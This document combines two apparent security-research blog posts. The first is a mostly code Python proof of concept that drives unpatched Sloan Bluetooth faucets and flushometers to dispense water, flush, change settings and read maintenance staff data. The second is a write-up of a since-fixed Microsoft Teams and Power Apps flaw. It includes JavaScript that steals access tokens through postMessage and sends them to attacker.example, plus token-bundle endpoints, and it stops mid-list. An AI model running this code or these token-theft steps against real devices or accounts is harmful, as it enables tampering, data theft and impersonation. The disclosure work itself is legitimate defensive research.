Here’s a quick proof of concept in case you’ve got an unpatched faucet or flushometer lying around. As of this posting, Sloan has not responded to our disclosure emails and to our knowledge has not released an update.

from bluepy.btle import Scanner, DefaultDelegate, Peripheral, UUID, BTLEDisconnectError, BTLEGattError, BTLEManagementError, BTLEInternalError
SCAN_TIMEOUT = 2.0
DEBUG = 0
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c965")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLOW_RATE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c949")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c945");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c944");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c943");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c942");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c906");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c905");
UUID_CHARACTERISTIC_FAUCET_BD_DEVICE_INFO_MODEL_NUMBER = UUID("00002a24-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c932");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c930");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92e");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92f");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c929");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92b");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92a");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92c");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92d");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_FLUSHER_NOTE_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88338");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_ACTIVATION_TIME_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88337");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_DIAGNOSTIC = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88335");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88331");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FIRMWARE_UPDATE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88336");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88334");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_LINE_SENTINAL_FLUSH_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88333");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88332");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90e");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90d");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90c");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90b");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90F");
AQUIS_UUIDS = (
    UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION,
    UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION,
    UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE,
    UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL,
    UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU
)
UUID_CHARACTERISTIC_APP_IDENTIFICATION_LOCK_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c953");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c954");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_TIMESTAMP = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c951");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c952");
LOCK_INFO = (
    UUID_CHARACTERISTIC_APP_IDENTIFICATION_LOCK_STATUS,
    UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE,
    UUID_CHARACTERISTIC_APP_IDENTIFICATION_TIMESTAMP,
    UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY,
)
FAUCET_PHONE_UUIDS = (
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE,
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE,
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE,
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE,
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET,
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE,
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE,
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE,
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE,
    UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_FLUSHER_NOTE_CHANGE,
    UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_ACTIVATION_TIME_CHANGE,
    UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_DIAGNOSTIC,
    UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET,
    UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FIRMWARE_UPDATE,
    UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE,
    UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_LINE_SENTINAL_FLUSH_CHANGE,
    UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE,
)
UUID_CHARACTERISTIC_OTA_CONTROL = UUID("f7bf3564-fb6d-4e53-88a4-5e37e0326063");
UUID_CHARACTERISTIC_OTA_DATA_TRANSFER = UUID("984227f3-34fc-4045-a5d0-2c581f81a153");
OTA = (
    UUID_CHARACTERISTIC_OTA_CONTROL,
    UUID_CHARACTERISTIC_OTA_DATA_TRANSFER,
)
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_1 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94a");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_2 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94b");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_3 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94c");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_4 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94d");
NOTES = (
    UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_1,
    UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_2,
    UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_3,
    UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_4,
)
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_COMMUNICATION_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c969");
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_SOLAR_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c968");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c966");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_DATE_OF_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c967");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_INIT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c961");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_SENSOR_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c962");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_TURBINE_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c964");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_VALVE_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c963");
DIAG = (
    UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC,
    UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_DATE_OF_DIAGNOSTIC,
    UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_INIT,
    UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_SENSOR_RESULT,
    UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_TURBINE_RESULT,
    UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_VALVE_RESULT,
    UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_COMMUNICATION_STATUS,
    UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_SOLAR_STATUS,
)
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88361");
UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_PRODUCTION_ENABLE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c971");
UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_ADAPTIVE_SENSING_ENABLE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c978");
UUID_CHARACTERISTIC_BATTERY_LEVEL = UUID("00002a19-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_BATTERY_LEVEL = UUID("00002a19-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c966");
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88364");
BATTERY_INFO = (
    UUID_CHARACTERISTIC_BATTERY_LEVEL,
    UUID_CHARACTERISTIC_FAUCET_BD_BATTERY_LEVEL,
    UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC,
    UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_BATTERY_LEVEL_AT_DIAGNOSTIC,
)
ATTACKS_DICT = {
    "0": ("Dispense Water", UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE, "Enter a 1 to begin Dispensing water: "),
    "1": ("Flush Toilet", UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE, "Enter a 1 to begin flushing diagnostic: "),
    "2": ("Change Faucet Flow Rate", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLOW_RATE, "Enter two digits together, they'll be a float (11 will be 1.1lpm): "),
    "3": ("Change Faucet Activation Mode", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION, "Enter a 0 (ondemand) or a 1 (metered) to change the activation mode.: "),
    "4": ("Change Faucet OnDemand Run Time", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME, "Enter 2 digits (10 = 10 seconds): "),
    "5": ("Change Faucet Metered Run Time", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME, "Enter 3 digits (120 = 120 seconds): "),
    "6": ("Change Sensor Range", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE, "Enter 1 digit (0 to disable sensor): "),
    "7": ("Read Maintenance Personnel Info", FAUCET_PHONE_UUIDS, "N/A"),
    "8": ("Change Model Number", UUID_CHARACTERISTIC_FAUCET_BD_DEVICE_INFO_MODEL_NUMBER, "Enter a new model number: "),
    "9": ("OTA (doesn't write)", OTA, "N/A"),
    "10": ("Read HW", UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION, "N/A"),
    "11": ("Read FW", UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION, "N/A"),
    "12": ("Read AQUIS Info", AQUIS_UUIDS, "N/A"),
    "13": ("Read Locking Information", LOCK_INFO, "N/A"),
    "14": ("Read Diagnostic Info", DIAG, "N/A"),
    "15": ("Read NOTES", NOTES, "N/A"),
    "16": ("Write NOTES", NOTES, "Enter something to write to the 4 notes fields:"),
    "17": ("Production Enable", UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_PRODUCTION_ENABLE, "Write something to production enable: "),
    "18": ("Adaptive Sensing Enable (gain/sensitivity changes not implemented)", UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_ADAPTIVE_SENSING_ENABLE, "Write to Adaptive Sensing Enable: "),
    "19": ("Read Battery Info", BATTERY_INFO, "N/A"),
}
class ScanDelegate(DefaultDelegate):
    def __init__(self):
        DefaultDelegate.__init__(self)
    #def handleDiscovery(self, dev):
    #    if dev

def convert_num_for_writing(text):
    if len(text) > 4:
        return text.encode()
    output = b''
    #for letter in text:
    #    output = output + str(hex(ord(letter)))[2:4].encode()
    output = text.encode()
    return output

def run_sink_flood(attack, target, p):
    attack_name = attack[0]
    uuid = attack[1]
    text = attack[2]
    target_name = target["name"]
    if type(uuid) == UUID:
        char = p.getCharacteristics(uuid=uuid)
        if char[0].supportsRead() and attack_name != "Dispense Water":
            val = char[0].read()
            print(f"[ >] {target_name} responds with current value: {val}")
        if not text == "N/A":
            sendme = input(text)
            sendme = convert_num_for_writing(sendme)
            char[0].write(sendme, withResponse=True)
    else:
        for i in uuid:
            try:
                char = p.getCharacteristics(uuid=i)
                if char[0].supportsRead():
                    val = char[0].read()
                    print(f"[ >] {target_name} responds with current value: {val}")
                if not text == "N/A":
                    sendme = input(text)
                    sendme = convert_num_for_writing(sendme)
                    char[0].write(sendme, withResponse=True)
            except BTLEGattError:
                pass

def menu_pick_attack(target):
    for attack in ATTACKS_DICT.keys():
        print(f"[{attack}] {ATTACKS_DICT[attack][0]}")
    selection = input("Enter a #: ")
    return ATTACKS_DICT[selection]

def menu_pick_device(devices):
    menu = {}
    i = 1
    target = None
    for dev in devices:
        for (adtype, desc, value) in dev.getScanData():
            if desc == "Complete Local Name":
                if type(value) == str and "FAUCET" in value:
                    menu["%s" % i] = {"name": value, "dev": dev}
                    i += 1
    options = menu.keys()
    if not options:
        return None
    sorted(options)
    for entry in options:
        print(f"[{entry}] {menu[entry]['dev'].addr} {menu[entry]['name']} ")
    selection = input("Enter a device #: ")
    if selection in menu.keys():
        target = menu[selection]
    return target

def lescan():
    scanner = Scanner(1).withDelegate(ScanDelegate())
    try:
        print(f"[*] scanning for {SCAN_TIMEOUT}")
        devices = scanner.scan(SCAN_TIMEOUT)
    except BTLEManagementError:
        print("[*] Permission to use HCI unavailable, rerun with sudo or as root.")
        return
    return devices

def main():
    print("[*] starting SINK FLOOD Sloan SmartFaucet and SmartFlushometer tool")
    while True:
        found_devices = lescan()
        if found_devices:
            target = menu_pick_device(found_devices)
            if not target:
                continue
            p = Peripheral(target['dev'].addr)
            #p = Peripheral('08:6b:d7:20:9d:4b')
            while target:
                attack = menu_pick_attack(target)
                run_sink_flood(attack, target, p)
            else:
                print("[*] target not found. have you tried turning it off and on again?")
                continue
        else:
            print("[*] something's not write. exiting.")
            exit()

if __name__ == "__main__":
    main()

Plumbing the Depths of Sloan’s Smart Bathroom Fixture Vulnerabilities was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs

14 June 2021 at 13:03

Trading up a small bug for a big impact

Intro

I recently came across an interesting bug in the Microsoft Power Apps service which, despite its simplicity, can be leveraged by an attacker to gain persistent read/write access to a victim user’s email, Teams chats, OneDrive, Sharepoint and a variety of other services by way of a malicious Microsoft Teams tab and Power Automate flows. The bug has since been fixed by Microsoft, but in this blog we’re going to see how it could have been exploited.

In the following sections, we’ll take a look at how we, as baduser(at)fakecorp.ca, a member of the fakecorp.ca organization, can create a malicious Teams tab and use it to eventually steal emails, Teams messages, and files from gooduser(at)fakecorp.ca, and send emails and messages on their behalf. While the attack we will look at has a lot of moving parts, it is fairly serious, as the compromise of business email is said to have cost victims $1.8 billion in 2020.

As an example to get us started, here is a quick clip of this method being used by Bad User to steal a Word document from Good User’s private OneDrive for Business.

Teams Tabs, Power Apps and Power Automate Flows

If you are already familiar with Teams and the Power Platform, feel free to skip this section, but otherwise, it may be useful to go over the pieces of the puzzle we’ll be using later.

Microsoft Teams has a default feature that allows a user to launch small applications as a tab in any team they are part of. If that user is part of an Office 365/Teams organization with a Business Basic license or above, they also have access to a set of Teams tabs which consist of Microsoft Power Apps applications.

A Teams tab with the Bulletins Power App

Power Apps are part of the wider Microsoft Power Platform, and when a user of a particular team launches their first Power App tab, it creates what Microsoft calls a “Dataverse for Teams Environment”, which according to Microsoft “is used to store, manage, and share team-specific data, apps, and flows”.

It should also be noted that, apart from the team-specific environments, there is a default environment for the organization as a whole. This is important because users can only create connectors and flows in either the default environment, or for teams which they own, and the attack we’re going to look at requires the ability to create Power Automate flows.

Power Automate is a service which lets users create automated workflows which can operate on their Office 365 organization’s data. For example, these flows can be used to do things like send emails on a particular schedule, or send Microsoft Teams messages any time a file on Sharepoint is updated.

Power Automate flow templates

The bug: trusting a bad domain

When a Power App tab is first created for a team, it runs through a deployment process that uses information gathered from the make.powerapps.com domain to install the application to the team dataverse/environment.

Installing the app

Teams tabs generally operate by opening an iframe to a page on a domain which is specified as trusted in that application’s manifest. What we see in the above image is a tab that contains an iframe to the page apps.powerapps.com/teams/makerportal?makerPortalUrl=https://make.powerapps.com/somePageHere, which itself is opening an iframe to the make.powerapps.com page passed in makerPortalUrl.

Immediately upon seeing this I was curious if I could make the apps.powerapps.com page load our own content. I noticed a couple of things:

  1. The apps.powerapps.com page will only load the iframe to makerPortalUrl if it is in a Microsoft Teams tab (it uses the Microsoft Teams javascript client sdk).
  2. The child iframe would only load if the makerPortalUrl begins with https://make.powerapps.com

We can see this happen if we view the page’s source, testing out different parameters. Trying to load any url which doesn’t begin with https://make.powerapps.com results in the makerPortalUrl being set to an empty string. However, the validation stops at checking whether the domain begins with make.powerapps.com, and does not check whether it is the full domain.

So, if we set makerPortalUrl equal to something like https://make.powerapps.com.fakecorp.ca/ we will be able to load our own content in the iframe!
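The core issue is classic URL prefix matching. A minimal Python sketch of the difference between the check that was effectively in place and a proper host-based check:

```python
from urllib.parse import urlparse

TRUSTED_PREFIX = "https://make.powerapps.com"

def naive_check(url):
    # effectively what the vulnerable page did
    return url.startswith(TRUSTED_PREFIX)

def host_check(url):
    # compare the full hostname instead of a string prefix
    return urlparse(url).hostname == "make.powerapps.com"

evil = "https://make.powerapps.com.fakecorp.ca/"
print(naive_check(evil))  # True: the attacker's look-alike domain slips through
print(host_check(evil))   # False
```

Because `make.powerapps.com.fakecorp.ca` is a subdomain of an attacker-controlled `fakecorp.ca`, the prefix check passes even though the host is entirely under our control.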

Cool, we can load an iframe with our own content two iframes deep in a Teams tab, but what does that get us? Microsoft Teams already has a website tab type which lets you load an iframe with a URL of your choosing, and with those you can’t do much. Fortunately for us, some tabs have more capabilities than others.

Stealing auth tokens with postMessage

We can load our own content in an iframe, which itself is sitting in an iframe on apps.powerapps.com. The reason this is more interesting than something like the Website tab type on Teams is that for Power App extension tab types, the apps.powerapps.com page communicates both with Teams, by way of the Teams JS SDK, and with its child iframe using javascript postMessage.

We can communicate with the parent window via postMessage

Using a Chrome extension, we can watch the postMessages passed between windows as an application is installed and launched. At first glance, the most interesting message is a postMessage from make.powerapps.com in the innermost window (the window which we are replacing when specifying our own makerPortalUrl) to the apps.powerapps.com window, with GET_ACCESS_TOKEN in the data.

The frame which we were replacing was getting access tokens from its parent window without passing any sort of authentication.

the child iframe requesting an access token via postMessage

I tested this same kind of postMessage from the make.powerapps.com.fakecorp.ca subdomain, and sure enough, I was able to grab the same access tokens. A handler is registered in the WebPlayer.EmbedMakerPortal.js file loaded by apps.powerapps.com which fetches tokens for the requested resource using the https://apps.powerapps.com/auth/onbehalfof endpoint, which in our testing is capable of grabbing tokens for:

- apihub.azure.com
- graph.microsoft.com
- dynamics apps subdomains
- service.flow.microsoft.com
- service.powerapps.com
Grabbing the access token from a page we control
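In skeleton form, the grab from our spoofed subdomain can be sketched like this (the exact message field names are assumptions for illustration, modeled on the GET_ACCESS_TOKEN messages we observed):

```javascript
// Build the token request a child frame would normally send to its parent.
// The field names here are assumed for illustration.
function buildTokenRequest(resource) {
  return { action: "GET_ACCESS_TOKEN", resource: resource };
}

// Pull a token out of a (hypothetical) response message, if present.
function extractToken(messageData) {
  return (messageData && messageData.data && messageData.data.accessToken) || null;
}

// In the browser, the malicious page wires these together:
if (typeof window !== "undefined" && window.parent !== window) {
  window.addEventListener("message", (event) => {
    const token = extractToken(event.data);
    if (token) {
      // Ship the stolen token to an attacker-controlled listener.
      fetch("https://attacker.example/steal?t=" + encodeURIComponent(token));
    }
  });
  window.parent.postMessage(
    buildTokenRequest("https://service.flow.microsoft.com"), "*");
}
```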

This is a super exciting thing to see: A tab under our control which can be created in a public team can retrieve access tokens on behalf of the user viewing it. Let’s slow down for a moment though, because I forgot to show an important step: how did we get our own content in a tab in the first place?

Overwriting a Teams tab

I mentioned earlier that Teams tabs generally operate by opening an iframe to a page which is specified in the tab application’s manifest. The request to define what page is loaded by a tab can be seen when adding a new tab or even renaming a currently existing tab.

The PUT request for renaming a tab lets us change the tab url

The url being given in this PUT request is pointing to the Bulletins Power App which is installed in our team environment. To point the tab to our malicious content we simply have to replace that url with our apps.powerapps.com/teams/makerportal?makerPortalUrl=https://make.powerapps.com.fakecorp.ca page.

It should be noted that this only works because we are passing a url with a trusted domain (apps.powerapps.com) according to the application’s manifest. If we try to pass malicious content directly as the tab’s url, the tab will not load our content.

A short and inconspicuous proof of concept

While the attacks we will look at later are longer and overly noisy for demonstration purposes, let’s consider a very quick proof of concept of how we could use what we currently have to steal access tokens from unsuspecting users.

If we host a page similar to the following and overwrite a tab to point to it, we can grab users’ service.flow.microsoft.com token and send it to another listener we control, while also loading the original Power App in an iframe that matches the tab size. While it won’t look exactly like a normally-running Power App tab, it doesn’t look different enough to notice. If the application requires postMessage communication with the parent app, we could even act as a man-in-the-middle for the postMessages being sent and received by adding a message handler to the PoC.
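A minimal sketch of such a page’s script might look like the following (attacker.example, the message shapes, and the app url are placeholders; the real PoC differs):

```javascript
// Hypothetical PoC sketch: request a token from the parent frame, exfiltrate
// it, then load the original Power App in a tab-sized iframe as cover.
function buildExfilUrl(listenerBase, token) {
  return listenerBase + "?token=" + encodeURIComponent(token);
}

if (typeof window !== "undefined" && window.parent !== window) {
  window.addEventListener("message", (event) => {
    const token = event.data && event.data.accessToken; // assumed field name
    if (!token) return;
    // Send the stolen service.flow.microsoft.com token home.
    new Image().src = buildExfilUrl("https://attacker.example/collect", token);
    // Keep up appearances: load the legitimate Power App for the victim.
    const frame = document.createElement("iframe");
    frame.src = "https://apps.powerapps.com/..."; // original app url (placeholder)
    frame.style.cssText = "border:0;width:100%;height:100vh";
    document.body.appendChild(frame);
  });
  // Assumed request shape, mirroring the observed token request messages.
  window.parent.postMessage(
    { action: "GET_ACCESS_TOKEN", resource: "https://service.flow.microsoft.com" },
    "*");
}
```

To act as a man-in-the-middle instead, the same message listener could simply forward postMessages between the parent window and the framed app.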

During the loading you can see two spinning circles. The smaller one is our JS running.

Now that we know we can steal certain tokens, let’s see what we can do with them, specifically the service.flow.microsoft.com token we just stole.

Stealing more tokens, emails, messages and files

The reason we’re focused on the service.flow.microsoft.com token is because it can be used to get us access to more tokens, and to create Power Automate flows, which will allow us to access a user’s email from Outlook, Teams messages, files from OneDrive and SharePoint, and a whole lot more.

We will construct the attack, at a high level, by:

- Grabbing an extra set of tokens from api.flow.microsoft.com
- Creating connectors to the services we want to access.
- Consenting on behalf of the victim user using first party logins
- Creating Power Automate flows on the victim user’s behalf which let us send emails and Teams messages, and retrieve emails, messages and files.
- Adding ourselves (or a group we’re in) to the owners of the flow.
- Having the victim user send an email to us containing any information we need to access the flows.

For our example we’re going to be showing pieces of a proof of concept which creates:

- Office 365 (for Outlook access) and Teams connectors
- A flow which lets us send emails as the user
- A flow which lets us get all Teams messages from channels the victim is in, and send messages on their behalf.

The api.flow.microsoft.com token bundle

The first stop on our quest to get access to everything the victim user holds dear is an api endpoint which will let us generate a handful of new access tokens. Sending an empty POST request to api.flow.microsoft.com/providers/Microsoft.ProcessSimple/environments/<environment>/users/me/onBehalfOfTokenBundle?api-version=2021-01-03 will let us grab the following tokens, with the following scopes:

the api.flow.microsoft.com token bundle
- graph.microsoft.com
  - scope: Contacts.Read Contacts.Read.Shared Group.Read.All TeamsAppInstallation.ReadWriteForTeam TeamsAppInstallation.ReadWriteSelfForChat User.Read User.ReadBasic.All
- graph.microsoft.net
  - scope: user_impersonation
- appservice.azure.com
  - scope: user_impersonation
- apihub.azure.com
  - scope: user_impersonation
- consent.msp.windows.net/logic-app-aad
  - scope: user_impersonation
- service.powerapps.com
  - scope: user_impersonation

